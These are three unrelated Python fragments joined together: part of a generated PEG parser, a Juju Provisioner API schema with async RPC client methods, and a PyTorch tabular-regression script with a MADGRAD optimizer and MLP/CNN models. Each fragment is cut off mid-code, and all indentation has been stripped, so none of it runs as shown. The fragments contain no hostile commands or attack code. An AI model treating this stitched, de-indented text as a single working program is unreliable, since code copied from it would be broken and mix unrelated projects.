index8, elements3 = self._offset, []
address7 = FAILURE
chunk6, max6 = None, self._offset + 6
if max6 <= self._input_size:
chunk6 = self._input[self._offset:max6]
if chunk6 == 'except':
address7 = TreeNode(self._input[self._offset:self._offset + 6], self._offset, [])
self._offset = self._offset + 6
else:
address7 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('\'except\'')
if address7 is not FAILURE:
elements3.append(address7)
address8 = FAILURE
index9 = self._offset
chunk7, max7 = None, self._offset + 1
if max7 <= self._input_size:
chunk7 = self._input[self._offset:max7]
if chunk7 is not None and Grammar.REGEX_8.search(chunk7):
address8 = TreeNode(self._input[self._offset:self._offset + 1], self._offset, [])
self._offset = self._offset + 1
else:
address8 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[0-9a-zA-Z_]')
self._offset = index9
if address8 is FAILURE:
address8 = TreeNode(self._input[self._offset:self._offset], self._offset, [])
self._offset = self._offset
else:
address8 = FAILURE
if address8 is not FAILURE:
elements3.append(address8)
else:
elements3 = None
self._offset = index8
else:
elements3 = None
self._offset = index8
if elements3 is None:
address0 = FAILURE
else:
address0 = TreeNode(self._input[index8:self._offset], index8, elements3)
self._offset = self._offset
if address0 is FAILURE:
self._offset = index1
index10, elements4 = self._offset, []
address9 = FAILURE
chunk8, max8 = None, self._offset + 3
if max8 <= self._input_size:
chunk8 = self._input[self._offset:max8]
if chunk8 == 'for':
address9 = TreeNode(self._input[self._offset:self._offset + 3], self._offset, [])
self._offset = self._offset + 3
else:
address9 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('\'for\'')
if address9 is not FAILURE:
elements4.append(address9)
address10 = FAILURE
index11 = self._offset
chunk9, max9 = None, self._offset + 1
if max9 <= self._input_size:
chunk9 = self._input[self._offset:max9]
if chunk9 is not None and Grammar.REGEX_9.search(chunk9):
address10 = TreeNode(self._input[self._offset:self._offset + 1], self._offset, [])
self._offset = self._offset + 1
else:
address10 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[0-9a-zA-Z_]')
self._offset = index11
if address10 is FAILURE:
address10 = TreeNode(self._input[self._offset:self._offset], self._offset, [])
self._offset = self._offset
else:
address10 = FAILURE
if address10 is not FAILURE:
elements4.append(address10)
else:
elements4 = None
self._offset = index10
else:
elements4 = None
self._offset = index10
if elements4 is None:
address0 = FAILURE
else:
address0 = TreeNode(self._input[index10:self._offset], index10, elements4)
self._offset = self._offset
if address0 is FAILURE:
self._offset = index1
index12, elements5 = self._offset, []
address11 = FAILURE
chunk10, max10 = None, self._offset + 5
if max10 <= self._input_size:
chunk10 = self._input[self._offset:max10]
if chunk10 == 'every':
address11 = TreeNode(self._input[self._offset:self._offset + 5], self._offset, [])
self._offset = self._offset + 5
else:
address11 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('\'every\'')
if address11 is not FAILURE:
elements5.append(address11)
address12 = FAILURE
index13 = self._offset
chunk11, max11 = None, self._offset + 1
if max11 <= self._input_size:
chunk11 = self._input[self._offset:max11]
if chunk11 is not None and Grammar.REGEX_10.search(chunk11):
address12 = TreeNode(self._input[self._offset:self._offset + 1], self._offset, [])
self._offset = self._offset + 1
else:
address12 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if | |
{'type': 'string'}},
'type': 'object'},
'image-metadata': {'items': {'$ref': '#/definitions/CloudImageMetadata'},
'type': 'array'},
'jobs': {'items': {'type': 'string'},
'type': 'array'},
'placement': {'type': 'string'},
'series': {'type': 'string'},
'subnets-to-zones': {'patternProperties': {'.*': {'items': {'type': 'string'},
'type': 'array'}},
'type': 'object'},
'tags': {'patternProperties': {'.*': {'type': 'string'}},
'type': 'object'},
'volume-attachments': {'items': {'$ref': '#/definitions/VolumeAttachmentParams'},
'type': 'array'},
'volumes': {'items': {'$ref': '#/definitions/VolumeParams'},
'type': 'array'}},
'required': ['constraints',
'series',
'placement',
'jobs'],
'type': 'object'},
'ProvisioningInfoResult': {'additionalProperties': False,
'properties': {'error': {'$ref': '#/definitions/Error'},
'result': {'$ref': '#/definitions/ProvisioningInfo'}},
'required': ['result'],
'type': 'object'},
'ProvisioningInfoResults': {'additionalProperties': False,
'properties': {'results': {'items': {'$ref': '#/definitions/ProvisioningInfoResult'},
'type': 'array'}},
'required': ['results'],
'type': 'object'},
'SetMachineNetworkConfig': {'additionalProperties': False,
'properties': {'config': {'items': {'$ref': '#/definitions/NetworkConfig'},
'type': 'array'},
'tag': {'type': 'string'}},
'required': ['tag', 'config'],
'type': 'object'},
'SetProfileArg': {'additionalProperties': False,
'properties': {'entity': {'$ref': '#/definitions/Entity'},
'profiles': {'items': {'type': 'string'},
'type': 'array'}},
'required': ['entity', 'profiles'],
'type': 'object'},
'SetProfileArgs': {'additionalProperties': False,
'properties': {'args': {'items': {'$ref': '#/definitions/SetProfileArg'},
'type': 'array'}},
'required': ['args'],
'type': 'object'},
'SetProfileUpgradeCompleteArg': {'additionalProperties': False,
'properties': {'entity': {'$ref': '#/definitions/Entity'},
'message': {'type': 'string'}},
'required': ['entity',
'message'],
'type': 'object'},
'SetProfileUpgradeCompleteArgs': {'additionalProperties': False,
'properties': {'args': {'items': {'$ref': '#/definitions/SetProfileUpgradeCompleteArg'},
'type': 'array'}},
'required': ['args'],
'type': 'object'},
'SetStatus': {'additionalProperties': False,
'properties': {'entities': {'items': {'$ref': '#/definitions/EntityStatusArgs'},
'type': 'array'}},
'required': ['entities'],
'type': 'object'},
'Settings': {'additionalProperties': False,
'properties': {'AutoNoProxy': {'type': 'string'},
'Ftp': {'type': 'string'},
'Http': {'type': 'string'},
'Https': {'type': 'string'},
'NoProxy': {'type': 'string'}},
'required': ['Http',
'Https',
'Ftp',
'NoProxy',
'AutoNoProxy'],
'type': 'object'},
'StatusResult': {'additionalProperties': False,
'properties': {'data': {'patternProperties': {'.*': {'additionalProperties': True,
'type': 'object'}},
'type': 'object'},
'error': {'$ref': '#/definitions/Error'},
'id': {'type': 'string'},
'info': {'type': 'string'},
'life': {'type': 'string'},
'since': {'format': 'date-time',
'type': 'string'},
'status': {'type': 'string'}},
'required': ['id',
'life',
'status',
'info',
'data',
'since'],
'type': 'object'},
'StatusResults': {'additionalProperties': False,
'properties': {'results': {'items': {'$ref': '#/definitions/StatusResult'},
'type': 'array'}},
'required': ['results'],
'type': 'object'},
'StringResult': {'additionalProperties': False,
'properties': {'error': {'$ref': '#/definitions/Error'},
'result': {'type': 'string'}},
'required': ['result'],
'type': 'object'},
'StringResults': {'additionalProperties': False,
'properties': {'results': {'items': {'$ref': '#/definitions/StringResult'},
'type': 'array'}},
'required': ['results'],
'type': 'object'},
'StringsResult': {'additionalProperties': False,
'properties': {'error': {'$ref': '#/definitions/Error'},
'result': {'items': {'type': 'string'},
'type': 'array'}},
'type': 'object'},
'StringsResults': {'additionalProperties': False,
'properties': {'results': {'items': {'$ref': '#/definitions/StringsResult'},
'type': 'array'}},
'required': ['results'],
'type': 'object'},
'StringsWatchResult': {'additionalProperties': False,
'properties': {'changes': {'items': {'type': 'string'},
'type': 'array'},
'error': {'$ref': '#/definitions/Error'},
'watcher-id': {'type': 'string'}},
'required': ['watcher-id'],
'type': 'object'},
'StringsWatchResults': {'additionalProperties': False,
'properties': {'results': {'items': {'$ref': '#/definitions/StringsWatchResult'},
'type': 'array'}},
'required': ['results'],
'type': 'object'},
'Tools': {'additionalProperties': False,
'properties': {'sha256': {'type': 'string'},
'size': {'type': 'integer'},
'url': {'type': 'string'},
'version': {'$ref': '#/definitions/Binary'}},
'required': ['version', 'url', 'size'],
'type': 'object'},
'ToolsResult': {'additionalProperties': False,
'properties': {'disable-ssl-hostname-verification': {'type': 'boolean'},
'error': {'$ref': '#/definitions/Error'},
'tools': {'items': {'$ref': '#/definitions/Tools'},
'type': 'array'}},
'required': ['tools',
'disable-ssl-hostname-verification'],
'type': 'object'},
'ToolsResults': {'additionalProperties': False,
'properties': {'results': {'items': {'$ref': '#/definitions/ToolsResult'},
'type': 'array'}},
'required': ['results'],
'type': 'object'},
'UpdateBehavior': {'additionalProperties': False,
'properties': {'enable-os-refresh-update': {'type': 'boolean'},
'enable-os-upgrade': {'type': 'boolean'}},
'required': ['enable-os-refresh-update',
'enable-os-upgrade'],
'type': 'object'},
'Value': {'additionalProperties': False,
'properties': {'arch': {'type': 'string'},
'container': {'type': 'string'},
'cores': {'type': 'integer'},
'cpu-power': {'type': 'integer'},
'instance-type': {'type': 'string'},
'mem': {'type': 'integer'},
'root-disk': {'type': 'integer'},
'spaces': {'items': {'type': 'string'},
'type': 'array'},
'tags': {'items': {'type': 'string'},
'type': 'array'},
'virt-type': {'type': 'string'},
'zones': {'items': {'type': 'string'},
'type': 'array'}},
'type': 'object'},
'Volume': {'additionalProperties': False,
'properties': {'info': {'$ref': '#/definitions/VolumeInfo'},
'volume-tag': {'type': 'string'}},
'required': ['volume-tag', 'info'],
'type': 'object'},
'VolumeAttachmentInfo': {'additionalProperties': False,
'properties': {'bus-address': {'type': 'string'},
'device-link': {'type': 'string'},
'device-name': {'type': 'string'},
'plan-info': {'$ref': '#/definitions/VolumeAttachmentPlanInfo'},
'read-only': {'type': 'boolean'}},
'type': 'object'},
'VolumeAttachmentParams': {'additionalProperties': False,
'properties': {'instance-id': {'type': 'string'},
'machine-tag': {'type': 'string'},
'provider': {'type': 'string'},
'read-only': {'type': 'boolean'},
'volume-id': {'type': 'string'},
'volume-tag': {'type': 'string'}},
'required': ['volume-tag',
'machine-tag',
'provider'],
'type': 'object'},
'VolumeAttachmentPlanInfo': {'additionalProperties': False,
'properties': {'device-attributes': {'patternProperties': {'.*': {'type': 'string'}},
'type': 'object'},
'device-type': {'type': 'string'}},
'type': 'object'},
'VolumeInfo': {'additionalProperties': False,
'properties': {'hardware-id': {'type': 'string'},
'persistent': {'type': 'boolean'},
'pool': {'type': 'string'},
'size': {'type': 'integer'},
'volume-id': {'type': 'string'},
'wwn': {'type': 'string'}},
'required': ['volume-id', 'size', 'persistent'],
'type': 'object'},
'VolumeParams': {'additionalProperties': False,
'properties': {'attachment': {'$ref': '#/definitions/VolumeAttachmentParams'},
'attributes': {'patternProperties': {'.*': {'additionalProperties': True,
'type': 'object'}},
'type': 'object'},
'provider': {'type': 'string'},
'size': {'type': 'integer'},
'tags': {'patternProperties': {'.*': {'type': 'string'}},
'type': 'object'},
'volume-tag': {'type': 'string'}},
'required': ['volume-tag',
'size',
'provider'],
'type': 'object'},
'WatchContainer': {'additionalProperties': False,
'properties': {'container-type': {'type': 'string'},
'machine-tag': {'type': 'string'}},
'required': ['machine-tag',
'container-type'],
'type': 'object'},
'WatchContainers': {'additionalProperties': False,
'properties': {'params': {'items': {'$ref': '#/definitions/WatchContainer'},
'type': 'array'}},
'required': ['params'],
'type': 'object'}},
'properties': {'APIAddresses': {'properties': {'Result': {'$ref': '#/definitions/StringsResult'}},
'type': 'object'},
'APIHostPorts': {'properties': {'Result': {'$ref': '#/definitions/APIHostPortsResult'}},
'type': 'object'},
'AvailabilityZone': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/StringResults'}},
'type': 'object'},
'CACert': {'properties': {'Result': {'$ref': '#/definitions/BytesResult'}},
'type': 'object'},
'CharmProfileChangeInfo': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/ProfileChangeResults'}},
'type': 'object'},
'Constraints': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/ConstraintsResults'}},
'type': 'object'},
'ContainerConfig': {'properties': {'Result': {'$ref': '#/definitions/ContainerConfig'}},
'type': 'object'},
'ContainerManagerConfig': {'properties': {'Params': {'$ref': '#/definitions/ContainerManagerConfigParams'},
'Result': {'$ref': '#/definitions/ContainerManagerConfig'}},
'type': 'object'},
'ControllerAPIInfoForModels': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/ControllerAPIInfoResults'}},
'type': 'object'},
'ControllerConfig': {'properties': {'Result': {'$ref': '#/definitions/ControllerConfigResult'}},
'type': 'object'},
'DistributionGroup': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/DistributionGroupResults'}},
'type': 'object'},
'DistributionGroupByMachineId': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/StringsResults'}},
'type': 'object'},
'EnsureDead': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/ErrorResults'}},
'type': 'object'},
'FindTools': {'properties': {'Params': {'$ref': '#/definitions/FindToolsParams'},
'Result': {'$ref': '#/definitions/FindToolsResult'}},
'type': 'object'},
'GetContainerInterfaceInfo': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/MachineNetworkConfigResults'}},
'type': 'object'},
'GetContainerProfileInfo': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/ContainerProfileResults'}},
'type': 'object'},
'HostChangesForContainers': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/HostNetworkChangeResults'}},
'type': 'object'},
'InstanceId': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/StringResults'}},
'type': 'object'},
'InstanceStatus': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/StatusResults'}},
'type': 'object'},
'KeepInstance': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/BoolResults'}},
'type': 'object'},
'Life': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/LifeResults'}},
'type': 'object'},
'MachinesWithTransientErrors': {'properties': {'Result': {'$ref': '#/definitions/StatusResults'}},
'type': 'object'},
'MarkMachinesForRemoval': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/ErrorResults'}},
'type': 'object'},
'ModelConfig': {'properties': {'Result': {'$ref': '#/definitions/ModelConfigResult'}},
'type': 'object'},
'ModelUUID': {'properties': {'Result': {'$ref': '#/definitions/StringResult'}},
'type': 'object'},
'PrepareContainerInterfaceInfo': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/MachineNetworkConfigResults'}},
'type': 'object'},
'ProvisioningInfo': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/ProvisioningInfoResults'}},
'type': 'object'},
'ReleaseContainerAddresses': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/ErrorResults'}},
'type': 'object'},
'Remove': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/ErrorResults'}},
'type': 'object'},
'RemoveUpgradeCharmProfileData': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/ErrorResults'}},
'type': 'object'},
'Series': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/StringResults'}},
'type': 'object'},
'SetCharmProfiles': {'properties': {'Params': {'$ref': '#/definitions/SetProfileArgs'},
'Result': {'$ref': '#/definitions/ErrorResults'}},
'type': 'object'},
'SetHostMachineNetworkConfig': {'properties': {'Params': {'$ref': '#/definitions/SetMachineNetworkConfig'}},
'type': 'object'},
'SetInstanceInfo': {'properties': {'Params': {'$ref': '#/definitions/InstancesInfo'},
'Result': {'$ref': '#/definitions/ErrorResults'}},
'type': 'object'},
'SetInstanceStatus': {'properties': {'Params': {'$ref': '#/definitions/SetStatus'},
'Result': {'$ref': '#/definitions/ErrorResults'}},
'type': 'object'},
'SetObservedNetworkConfig': {'properties': {'Params': {'$ref': '#/definitions/SetMachineNetworkConfig'}},
'type': 'object'},
'SetPasswords': {'properties': {'Params': {'$ref': '#/definitions/EntityPasswords'},
'Result': {'$ref': '#/definitions/ErrorResults'}},
'type': 'object'},
'SetProviderNetworkConfig': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/ErrorResults'}},
'type': 'object'},
'SetStatus': {'properties': {'Params': {'$ref': '#/definitions/SetStatus'},
'Result': {'$ref': '#/definitions/ErrorResults'}},
'type': 'object'},
'SetSupportedContainers': {'properties': {'Params': {'$ref': '#/definitions/MachineContainersParams'},
'Result': {'$ref': '#/definitions/ErrorResults'}},
'type': 'object'},
'SetUpgradeCharmProfileComplete': {'properties': {'Params': {'$ref': '#/definitions/SetProfileUpgradeCompleteArgs'},
'Result': {'$ref': '#/definitions/ErrorResults'}},
'type': 'object'},
'StateAddresses': {'properties': {'Result': {'$ref': '#/definitions/StringsResult'}},
'type': 'object'},
'Status': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/StatusResults'}},
'type': 'object'},
'Tools': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/ToolsResults'}},
'type': 'object'},
'UpdateStatus': {'properties': {'Params': {'$ref': '#/definitions/SetStatus'},
'Result': {'$ref': '#/definitions/ErrorResults'}},
'type': 'object'},
'WatchAPIHostPorts': {'properties': {'Result': {'$ref': '#/definitions/NotifyWatchResult'}},
'type': 'object'},
'WatchAllContainers': {'properties': {'Params': {'$ref': '#/definitions/WatchContainers'},
'Result': {'$ref': '#/definitions/StringsWatchResults'}},
'type': 'object'},
'WatchContainers': {'properties': {'Params': {'$ref': '#/definitions/WatchContainers'},
'Result': {'$ref': '#/definitions/StringsWatchResults'}},
'type': 'object'},
'WatchContainersCharmProfiles': {'properties': {'Params': {'$ref': '#/definitions/WatchContainers'},
'Result': {'$ref': '#/definitions/StringsWatchResults'}},
'type': 'object'},
'WatchForModelConfigChanges': {'properties': {'Result': {'$ref': '#/definitions/NotifyWatchResult'}},
'type': 'object'},
'WatchMachineErrorRetry': {'properties': {'Result': {'$ref': '#/definitions/NotifyWatchResult'}},
'type': 'object'},
'WatchModelMachines': {'properties': {'Result': {'$ref': '#/definitions/StringsWatchResult'}},
'type': 'object'},
'WatchModelMachinesCharmProfiles': {'properties': {'Result': {'$ref': '#/definitions/StringsWatchResult'}},
'type': 'object'}},
'type': 'object'}
@ReturnMapping(StringsResult)
async def APIAddresses(self):
'''
Returns -> typing.Union[_ForwardRef('Error'), typing.Sequence[str]]
'''
# map input types to rpc msg
_params = dict()
msg = dict(type='Provisioner',
request='APIAddresses',
version=7,
params=_params)
reply = await self.rpc(msg)
return reply
@ReturnMapping(APIHostPortsResult)
async def APIHostPorts(self):
'''
Returns -> typing.Sequence[~HostPort]
'''
# map input types to rpc msg
_params = dict()
msg = dict(type='Provisioner',
request='APIHostPorts',
version=7,
params=_params)
reply = await self.rpc(msg)
return reply
@ReturnMapping(StringResults)
async def AvailabilityZone(self, entities=None):
'''
entities : typing.Sequence[~Entity]
Returns -> typing.Sequence[~StringResult]
'''
if entities is not None and not isinstance(entities, (bytes, str, list)):
raise Exception("Expected entities to be a Sequence, received: {}".format(type(entities)))
# map input types to rpc msg
_params = dict()
msg = dict(type='Provisioner',
request='AvailabilityZone',
version=7,
params=_params)
_params['entities'] = entities
reply = await self.rpc(msg)
return reply
@ReturnMapping(BytesResult)
async def CACert(self):
'''
Returns -> typing.Sequence[int]
'''
# map input types to rpc msg
_params = dict()
msg = dict(type='Provisioner',
request='CACert',
version=7,
params=_params)
| |
<gh_stars>1-10
import math
import os
import pickle
import random
from typing import Any, Callable, List, Optional, Union, TYPE_CHECKING
import numpy as np
import pandas as pd
import torch
import torch.nn as nn
from sklearn.metrics import mean_absolute_error
from sklearn.preprocessing import StandardScaler, QuantileTransformer
from torch.optim.optimizer import Optimizer
from torch.utils.data import Dataset, DataLoader
from tqdm import tqdm
from src.config import NNConfig
from src.constants import CATEGORICAL_COLS
from src.util import TimeSeriesSplit
if TYPE_CHECKING:
from torch.optim.optimizer import _params_t
else:
_params_t = Any
def seed_everything(seed=42):
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.backends.cudnn.deterministic = True
class MADGRAD(Optimizer):
def __init__(
self, params: _params_t, lr: float = 1e-2, momentum: float = 0.9, weight_decay: float = 0,
eps: float = 1e-6,
):
if momentum < 0 or momentum >= 1:
raise ValueError(f"Momentum {momentum} must be in the range [0,1]")
if lr <= 0:
raise ValueError(f"Learning rate {lr} must be positive")
if weight_decay < 0:
raise ValueError(f"Weight decay {weight_decay} must be non-negative")
if eps < 0:
raise ValueError(f"Eps must be non-negative")
defaults = dict(lr=lr, eps=eps, momentum=momentum, weight_decay=weight_decay)
super().__init__(params, defaults)
@property
def supports_memory_efficient_fp16(self) -> bool:
return False
@property
def supports_flat_params(self) -> bool:
return True
def step(self, closure: Optional[Callable[[], float]] = None) -> Optional[float]:
loss = None
if closure is not None:
loss = closure()
if 'k' not in self.state:
self.state['k'] = torch.tensor([0], dtype=torch.long)
k = self.state['k'].item()
for group in self.param_groups:
eps = group["eps"]
lr = group["lr"] + eps
decay = group["weight_decay"]
momentum = group["momentum"]
ck = 1 - momentum
lamb = lr * math.pow(k + 1, 0.5)
for p in group["params"]:
if p.grad is None:
continue
grad = p.grad.data
state = self.state[p]
if "grad_sum_sq" not in state:
state["grad_sum_sq"] = torch.zeros_like(p.data).detach()
state["s"] = torch.zeros_like(p.data).detach()
if momentum != 0:
state["x0"] = torch.clone(p.data).detach()
if momentum != 0.0 and grad.is_sparse:
raise RuntimeError("momentum != 0 is not compatible with sparse gradients")
grad_sum_sq = state["grad_sum_sq"]
s = state["s"]
# Apply weight decay
if decay != 0:
if grad.is_sparse:
raise RuntimeError("weight_decay option is not compatible with sparse gradients")
grad.add_(p.data, alpha=decay)
if grad.is_sparse:
grad = grad.coalesce()
grad_val = grad._values()
p_masked = p.sparse_mask(grad)
grad_sum_sq_masked = grad_sum_sq.sparse_mask(grad)
s_masked = s.sparse_mask(grad)
# Compute x_0 from other known quantities
rms_masked_vals = grad_sum_sq_masked._values().pow(1 / 3).add_(eps)
x0_masked_vals = p_masked._values().addcdiv(s_masked._values(), rms_masked_vals, value=1)
# Dense + sparse op
grad_sq = grad * grad
grad_sum_sq.add_(grad_sq, alpha=lamb)
grad_sum_sq_masked.add_(grad_sq, alpha=lamb)
rms_masked_vals = grad_sum_sq_masked._values().pow_(1 / 3).add_(eps)
s.add_(grad, alpha=lamb)
s_masked._values().add_(grad_val, alpha=lamb)
# update masked copy of p
p_kp1_masked_vals = x0_masked_vals.addcdiv(s_masked._values(), rms_masked_vals, value=-1)
# Copy updated masked p to dense p using an add operation
p_masked._values().add_(p_kp1_masked_vals, alpha=-1)
p.data.add_(p_masked, alpha=-1)
else:
if momentum == 0:
# Compute x_0 from other known quantities
rms = grad_sum_sq.pow(1 / 3).add_(eps)
x0 = p.data.addcdiv(s, rms, value=1)
else:
x0 = state["x0"]
# Accumulate second moments
grad_sum_sq.addcmul_(grad, grad, value=lamb)
rms = grad_sum_sq.pow(1 / 3).add_(eps)
# Update s
s.data.add_(grad, alpha=lamb)
# Step
if momentum == 0:
p.data.copy_(x0.addcdiv(s, rms, value=-1))
else:
z = x0.addcdiv(s, rms, value=-1)
# p is a moving average of z
p.data.mul_(1 - ck).add_(z, alpha=ck)
self.state['k'] += 1
return loss
class AverageMeter:
"""Computes and stores the average and current value"""
def __init__(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
class TabularDataset(Dataset):
def __init__(self, x_num: np.ndarray, x_cat: np.ndarray, y: Optional[np.ndarray]):
super().__init__()
self.x_num = x_num
self.x_cat = x_cat
self.y = y
def __len__(self):
return len(self.x_num)
def __getitem__(self, idx):
if self.y is None:
return self.x_num[idx], torch.LongTensor(self.x_cat[idx])
else:
return self.x_num[idx], torch.LongTensor(self.x_cat[idx]), self.y[idx]
class MLP(nn.Module):
def __init__(self,
src_num_dim: int,
n_categories: List[int],
dropout: float = 0.0,
hidden: int = 50,
emb_dim: int = 10,
dropout_cat: float = 0.2,
bn: bool = False):
super().__init__()
self.embs = nn.ModuleList([
nn.Embedding(x, emb_dim) for x in n_categories])
self.cat_dim = emb_dim * len(n_categories)
self.dropout_cat = nn.Dropout(dropout_cat)
if bn:
self.sequence = nn.Sequential(
nn.Linear(src_num_dim + self.cat_dim, hidden),
nn.Dropout(dropout),
nn.BatchNorm1d(hidden),
nn.ReLU(),
nn.Linear(hidden, hidden),
nn.Dropout(dropout),
nn.BatchNorm1d(hidden),
nn.ReLU(),
nn.Linear(hidden, 4)
)
else:
self.sequence = nn.Sequential(
nn.Linear(src_num_dim + self.cat_dim, hidden),
nn.Dropout(dropout),
nn.ReLU(),
nn.Linear(hidden, hidden),
nn.Dropout(dropout),
nn.ReLU(),
nn.Linear(hidden, 4)
)
def forward(self, x_num, x_cat):
embs = [embedding(x_cat[:, i]) for i, embedding in enumerate(self.embs)]
x_cat_emb = self.dropout_cat(torch.cat(embs, 1))
x_all = torch.cat([x_num, x_cat_emb], 1)
x = self.sequence(x_all)
return torch.clamp(x, 0, 100)
class CNN(nn.Module):
def __init__(self,
num_features: int,
hidden_size: int,
n_categories: List[int],
emb_dim: int = 10,
dropout_cat: float = 0.2,
channel_1: int = 256,
channel_2: int = 512,
channel_3: int = 512,
dropout_top: float = 0.1,
dropout_mid: float = 0.3,
dropout_bottom: float = 0.2,
weight_norm: bool = True,
two_stage: bool = True,
celu: bool = True,
kernel1: int = 5):
super().__init__()
num_targets = 4
cha_1_reshape = int(hidden_size / channel_1)
cha_po_1 = int(hidden_size / channel_1 / 2)
cha_po_2 = int(hidden_size / channel_1 / 2 / 2) * channel_3
self.cat_dim = emb_dim * len(n_categories)
self.cha_1 = channel_1
self.cha_2 = channel_2
self.cha_3 = channel_3
self.cha_1_reshape = cha_1_reshape
self.cha_po_1 = cha_po_1
self.cha_po_2 = cha_po_2
self.two_stage = two_stage
self.expand = nn.Sequential(
nn.BatchNorm1d(num_features + self.cat_dim),
nn.Dropout(dropout_top),
nn.utils.weight_norm(nn.Linear(num_features + self.cat_dim, hidden_size), dim=None),
nn.CELU(0.06) if celu else nn.ReLU()
)
def _norm(layer, dim=None):
return nn.utils.weight_norm(layer, dim=dim) if weight_norm else layer
self.conv1 = nn.Sequential(
nn.BatchNorm1d(channel_1),
nn.Dropout(dropout_top),
_norm(nn.Conv1d(channel_1, channel_2, kernel_size=kernel1, stride=1, padding=kernel1 // 2, bias=False)),
nn.ReLU(),
nn.AdaptiveAvgPool1d(output_size=cha_po_1),
nn.BatchNorm1d(channel_2),
nn.Dropout(dropout_top),
_norm(nn.Conv1d(channel_2, channel_2, kernel_size=3, stride=1, padding=1, bias=True)),
nn.ReLU()
)
if self.two_stage:
self.conv2 = nn.Sequential(
nn.BatchNorm1d(channel_2),
nn.Dropout(dropout_mid),
_norm(nn.Conv1d(channel_2, channel_2, kernel_size=3, stride=1, padding=1, bias=True)),
nn.ReLU(),
nn.BatchNorm1d(channel_2),
nn.Dropout(dropout_bottom),
_norm(nn.Conv1d(channel_2, channel_3, kernel_size=5, stride=1, padding=2, bias=True)),
nn.ReLU()
)
self.max_po_c2 = nn.MaxPool1d(kernel_size=4, stride=2, padding=1)
self.flt = nn.Flatten()
self.dense = nn.Sequential(
nn.BatchNorm1d(cha_po_2),
nn.Dropout(dropout_bottom),
_norm(nn.Linear(cha_po_2, num_targets), dim=0)
)
self.embs = nn.ModuleList([nn.Embedding(x, emb_dim) for x in n_categories])
self.cat_dim = emb_dim * len(n_categories)
self.dropout_cat = nn.Dropout(dropout_cat)
def forward(self, x_num, x_cat):
embs = [embedding(x_cat[:, i]) for i, embedding in enumerate(self.embs)]
x_cat_emb = self.dropout_cat(torch.cat(embs, 1))
x = torch.cat([x_num, x_cat_emb], 1)
x = self.expand(x)
x = x.reshape(x.shape[0], self.cha_1, self.cha_1_reshape)
x = self.conv1(x)
if self.two_stage:
x = self.conv2(x) * x
x = self.max_po_c2(x)
x = self.flt(x)
x = self.dense(x)
return x
def train_epoch_2(data_loader: DataLoader,
model: nn.Module,
optimizer,
scheduler,
device,
clip_grad: float = 1.5,
loss_func=None):
model.train()
losses = AverageMeter()
step = 0
if loss_func is None:
loss_func = nn.L1Loss()
for x_num, x_cat, y in tqdm(data_loader, position=0, leave=True, desc='Training'):
batch_size = x_num.size(0)
x_num = x_num.to(device, dtype=torch.float)
x_cat = x_cat.to(device)
y = y.to(device, dtype=torch.float)
loss = loss_func(model(x_num, x_cat), y)
losses.update(loss.detach().cpu().numpy(), batch_size)
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), clip_grad)
optimizer.step()
optimizer.zero_grad()
if scheduler is not None:
scheduler.step()
step += 1
return losses.avg
def evaluate_2(data_loader: DataLoader, model, device):
model.eval()
losses = AverageMeter()
final_targets = []
final_outputs = []
with torch.no_grad():
for x_num, x_cat, y in tqdm(data_loader, position=0, leave=True, desc='Evaluating'):
batch_size = x_num.size(0)
x_num = x_num.to(device, dtype=torch.float)
x_cat = x_cat.to(device)
y = y.to(device, dtype=torch.float)
with torch.no_grad():
output = model(x_num, x_cat)
loss = nn.L1Loss()(output, y)
# record loss
losses.update(loss.detach().cpu().numpy(), batch_size)
targets = y.detach().cpu().numpy()
